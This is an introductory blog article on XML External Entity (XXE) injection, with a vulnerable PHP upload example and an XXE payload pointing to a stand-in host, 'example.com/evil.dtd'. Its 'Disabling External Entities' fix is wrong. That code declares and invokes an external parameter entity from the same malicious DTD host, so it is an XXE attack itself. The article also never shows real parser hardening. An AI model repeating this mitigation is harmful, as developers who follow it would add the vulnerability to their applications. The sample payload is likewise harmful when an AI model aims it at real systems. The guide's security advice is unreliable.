XML external entity (XXE) 101

anuragTaparia

A type of security flaw called XML External Entity Injection (XXE) enables attackers to take advantage of online applications and access sensitive data or run malicious code on the server. When an application processes XML input without performing sufficient validation, foreign entities are permitted to be inserted in the XML document, which results in this kind of attack.
In this article, we’ll describe how to avoid XXE attacks in simple terms and give an example of how one may be exploited.

What is XML?

XML stands for Extensible Markup Language. It is a standard format for exchanging data between different systems, regardless of the platform or programming language used. XML uses tags to define data elements and the structure of the document.

What are External Entities?

External entities in XML allow a document to reference content from an external source, such as a file or a URL. These entities can be useful when reusing common content across multiple documents. However, if an attacker can control the content of the external entity, they can use it to inject malicious code into the XML document.

What is XXE?

XXE is a type of attack that exploits the use of external entities in XML. An attacker can craft an XML document that includes an external entity with a malicious payload. When the XML document is processed by the web application, the malicious payload is executed, allowing the attacker to access sensitive data or execute arbitrary code on the server.

Source portswigger

Example of XXE Attack:

Suppose there is a web application that allows users to upload an XML file and then displays the content of the file on the screen. The web application might use the following code to process the uploaded XML file:

$xml = simplexml_load_file($_FILES['file']['tmp_name']);
echo $xml->to;
echo $xml->from;
echo $xml->body;

This code reads the XML file uploaded by the user, extracts the ‘to’, ‘from’, and ‘body’ elements, and displays them on the screen. However, if the XML file contains an external entity reference that points to a malicious payload, an attacker can exploit this vulnerability to execute the payload on the server.

For example, an attacker could craft an XML file with the following content:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "http://example.com/evil.dtd">
]>
<foo>&xxe;</foo>

In this example, the XML file includes an external entity reference called ‘xxe’. This entity points to a DTD (Document Type Definition) file hosted on an attacker-controlled server. The DTD file contains a malicious payload that is executed when the XML document is processed by the web application.
The malicious payload could, for example, extract sensitive data from the server, such as passwords or credit card numbers, and send it to the attacker’s server.

Preventing XXE Attacks

To prevent XXE attacks, web applications must ensure that the XML input they receive is properly validated and does not contain any malicious code or external entity references.

Disabling External Entities:
One way to prevent XXE attacks is to disable external entities in the XML document. This can be done by adding the following code at the beginning of the XML document:

<!DOCTYPE foo [
  <!ENTITY % foo SYSTEM "about:blank">
  <!ENTITY % xxepayload SYSTEM "http://example.com/evil.dtd">
  %xxepayload;
  %foo;
]>

This code disables all external entities in the XML document, including the ones defined in the DTD.

Input Validation:
Input validation is an important step in preventing XXE attacks. Web applications must validate the XML input to ensure that it only contains legitimate data and does not contain any malicious code or external entity references.
One way to validate the XML input is to use an XML parser that supports the XSD (XML Schema Definition) format. XSD is a standard way to define the structure and data types of an XML document. By using XSD, web applications can ensure that the XML input conforms to a specific schema and does not contain any unexpected elements or attributes.

Whitelisting:
Another way to prevent XXE attacks is to use a whitelist approach. In this approach, the web application only allows specific external entities to be included in the XML document. All other entities are blocked, preventing attackers from injecting their own malicious code.

Conclusion

In conclusion, XXE attacks can be a serious threat to web applications that use XML input. Attackers can exploit this vulnerability to gain access to sensitive data or execute malicious code on the server. To prevent XXE attacks, web applications must ensure that the XML input they receive is properly validated and does not contain any malicious code or external entity references. Disabling external entities, input validation, and whitelisting are all effective ways to prevent XXE attacks.

References

OWASP: XML External Entity (XXE) Processing - https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing
SANS Institute: XML External Entity (XXE) Processing - https://www.sans.org/reading-room/whitepapers/application/xml-external-entity-xxe-processing-35157
PortSwigger: XML External Entity (XXE) Injection - https://portswigger.net/web-security/xxe-injection
IBM: Preventing XML External Entity (XXE) Injection - https://www.ibm.com/docs/en/security-appscan/9.0.3.3?topic=ov-preventing-xml-external-entity-injection-xxe
Rapid7: XML External Entity Injection - https://www.rapid7.com/resources/xml-external-entity-injection/